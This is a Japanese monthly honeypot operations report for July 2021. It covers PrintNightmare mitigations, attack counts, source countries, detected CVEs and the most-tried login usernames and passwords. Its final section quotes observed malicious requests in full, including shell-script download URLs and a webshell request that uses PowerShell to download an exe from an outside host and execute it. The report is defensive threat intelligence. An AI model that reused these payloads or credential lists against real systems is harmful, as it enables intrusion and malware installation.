ハニーポット運用(月次報告:2021年7月)
今月のTopics
6月29日にGithub上にてWindowsの印刷スプーラーの脆弱性(CVE-2021-1675)を悪用した任意コードの実行を可能とするPocが公開された。公開情報は削除されたものの、ドメインコントローラや特定の状況を満たす非ドメインコントローラ環境への攻撃に対しては依然として有効であった。7月1日にWindows 印刷スプーラーのリモートでコードが実行される脆弱性(CVE-2021-34527)としてMS社が公開するに至った。
7月7日に脆弱性の対策パッチが定例外の緊急パッチとして報告されたが、7月8日に判明した情報より特定の条件下により以前として脆弱性は残るとのこと。
MS社ではパッチ適用と併せて以下のレジストリへの対策を公開している。
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint -> NoWarningNoElevationOnInstall = 0 (DWORD) または未定義 (既定の設定) -> UpdatePromptSettings = 0 (DWORD) または未定義 (既定の設定)
MS社が公開している回避策は以下の2点だが、どちらも業務影響が大きくある。
オプション 1: 印刷スプーラー サービスを無効にする
・Print Spoolerサービスを停止した上で、無効化する。
※「サービス」からPrint Spoolerサービスを停止してもよい。
※この方法だとほぼプリンター印刷ができなくなり、環境によりPDF形式でのドキュメント保存もできなくなる。
※Excelなどの「改ページプレビュー」の指定範囲が滅茶苦茶になるので納品ドキュメントで印刷用に指定していた改ページの設定が無に帰す。(ヤメテー)
オプション 2 - グループ ポリシーで受信リモート印刷を無効にする
・mmc.exeからMicrosoft管理コンソールを起動する。
・スナップインの追加と削除からグループポリシーオブジェクトエディターを開く
[コンピューターの構成]/[管理用テンプレート]/[プリンター]
[印刷スプーラーにクライアント接続の受け入れを許可する] ポリシーを無効にする。
※グループ ポリシーを有効にするには、印刷スプーラー サービスを再起動する必要あり。
※適用したことによる他サービスへの影響が不明なリスク有り。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年7月1日-2021年7月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1,716,443 | ▲1,707,411 |
| 2 | Heralding | 1,188,345 | 432,859 |
| 3 | Honeytrap | 825,725 | 306,439 |
| 4 | Dionaea | 354,027 | 2,638 |
| 5 | Rdpy | 106,290 | 17,712 |
| 6 | Ciscoasa | 33,896 | 32,477 |
| 7 | Mailoney | 14,524 | 3,682 |
| 8 | Adbhoney | 9,267 | ▲5,433 |
| 9 | Tanner | 5,275 | 1,074 |
| 10 | CitrixHoneypot | 1,629 | 119 |
| 11 | ConPot | 1,582 | ▲519 |
| 12 | ElasticPot | 1,221 | ▲48 |
| 13 | Medpot | 148 | ▲8 |
- Result
- 通常時と比較してCiscoasaのアクセスが増加していた。確認すると中国から7/12 0時と7/19 12時にアクセス数が増えていた模様。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Netherlands | 877,814 | 4(↑) |
| 2 | Russia | 813,285 | 3(↑) |
| 3 | China | 587,526 | 2(↓) |
| 4 | United States | 318,650 | 6(↑) |
| 5 | Ireland | 300,833 | 1(↓) |
| 6 | France | 211,467 | 8(↑) |
| 7 | Panama | 160,954 | 5(↓) |
| 8 | Singapore | 63,908 | 13(↑) |
| 9 | India | 60,133 | 9(→) |
| 10 | Japan | 57,348 | 19(↑) |
| 11 | Vietnam | 57,054 | 11(→) |
| 12 | Italy | 52,591 | 圏外(↑) |
| 13 | Brazil | 50,198 | 14(↑) |
| 14 | South Korea | 47,526 | 12(↓) |
| 15 | Germany | 26,492 | 18(↑) |
| 16 | Latvia | 25,643 | 圏外(↑) |
| 17 | Indonesia | 24,047 | 16(↓) |
| 18 | Bulgaria | 23,768 | 10(↓) |
| 19 | Sweden | 21,615 | 20(↑) |
| 20 | United Kingdom | 19,831 | 圏外(↑) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,405,632 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 259 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 22 |
| 4 | CVE-2020-11910 | 8 |
| 5 | CVE-2020-8515 CVE-2020-8515 | 1 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 171,490 |
| 2 | admin | 38,106 |
| 3 | sh | 3,526 |
| 4 | support | 3,525 |
| 5 | user | 3,112 |
| 6 | nproc | 2,981 |
| 7 | sa | 1,598 |
| 8 | 22 | 1,443 |
| 9 | test | 1,065 |
| 10 | 1,064 | |
| 11 | default | 998 |
| 12 | ubuntu | 662 |
| 13 | postgres | 582 |
| 14 | 2Wire | 538 |
| 15 | guest | 518 |
| 16 | !root | 510 |
| 17 | oracle | 434 |
| 18 | www | 415 |
| 19 | git | 379 |
| 20 | adm | 374 |
| 21 | 666666 | 365 |
| 22 | debug | 365 |
| 23 | unknown | 362 |
| 24 | ftpuser | 326 |
| 25 | administrator | 320 |
| 26 | Admin | 307 |
| 27 | anonymous | 298 |
| 28 | www-data | 280 |
| 29 | web | 242 |
| 30 | user123 | 239 |
| 31 | ftp | 236 |
| 32 | minecraft | 226 |
| 33 | blank | 218 |
| 34 | mysql | 216 |
| 35 | deploy | 198 |
| 36 | pi | 196 |
| 37 | 0 | 194 |
| 38 | db | 184 |
| 39 | data | 178 |
| 40 | wwwroot | 176 |
| 41 | testuser | 175 |
| 42 | ubnt | 166 |
| 43 | user1 | 162 |
| 44 | minerstat | 161 |
| 45 | mos | 160 |
| 46 | operator | 149 |
| 47 | jenkins | 147 |
| 48 | MISASME2021 | 144 |
| 49 | MISASME2020 | 141 |
| 50 | 101 | 136 |
- Result
- MISASME2020(48位)とMISASME(49位)を新規に確認した。
調査した限りではベトナムのMISA社の会計ソフトと想定される。
- MISASME2020(48位)とMISASME(49位)を新規に確認した。
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 89,980 |
| 2 | 4,295 | |
| 3 | support | 3,417 |
| 4 | nproc | 2,981 |
| 5 | 123456 | 2,887 |
| 6 | root | 2,522 |
| 7 | password | 1,795 |
| 8 | 1234 | 1,379 |
| 9 | 123 | 1,318 |
| 10 | 1 | 1,046 |
| 11 | 12345 | 1,013 |
| 12 | blank | 935 |
| 13 | vizxv | 919 |
| 14 | 12345678 | 789 |
| 15 | user | 596 |
| 16 | ubnt | 531 |
| 17 | test | 496 |
| 18 | 666666 | 458 |
| 19 | 0 | 437 |
| 20 | alpine | 407 |
| 21 | backup | 390 |
| 22 | master | 390 |
| 23 | hi3518 | 378 |
| 24 | unknown | 370 |
| 25 | 1q2w3e4r | 356 |
| 26 | 123123 | 354 |
| 27 | synnet | 350 |
| 28 | Password | 327 |
| 29 | 1qaz2wsx | 309 |
| 30 | 111111 | 270 |
| 31 | 123456789 | 221 |
| 32 | passw0rd | 221 |
| 33 | 0 | 219 |
| 34 | ABCabc@123 | 207 |
| 35 | pass | 205 |
| 36 | qwerty | 193 |
| 37 | guest | 191 |
| 38 | 1234567 | 176 |
| 39 | 123321 | 169 |
| 40 | p@ssw0rd | 165 |
| 41 | iloveyou | 163 |
| 42 | princess | 158 |
| 43 | Passw0rd | 156 |
| 44 | !ishtar | 150 |
| 45 | operator | 148 |
| 46 | abc123 | 146 |
| 47 | Admin | 143 |
| 48 | test123 | 143 |
| 49 | abcABC@123 | 139 |
| 50 | mos | 137 |
- Result
- synnet(27位)は3COM社の各種ルータのデフォルトパスワードのため、変更していない場合は注意が必要。中でもCellPlexモデルの機器ではadmin権限が割り当てられているので特に注意すべき。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- PrintNightmare関連アクセスはT-Pot上で観測できず。
- shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
http://168[.]138[.]143[.]186/setup.sh
http://betaalverzoek.ir/binInfect.sh
ftp://anonymous:anonymous@betaalverzoek.ir/binInfect1.sh
◆exeファイルに関するアクセス
/FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe
/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands
/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/iwgvymtjindipcg2429.exe');start%20C:/Windows/temp/iwgvymtjindipcg2429.exe
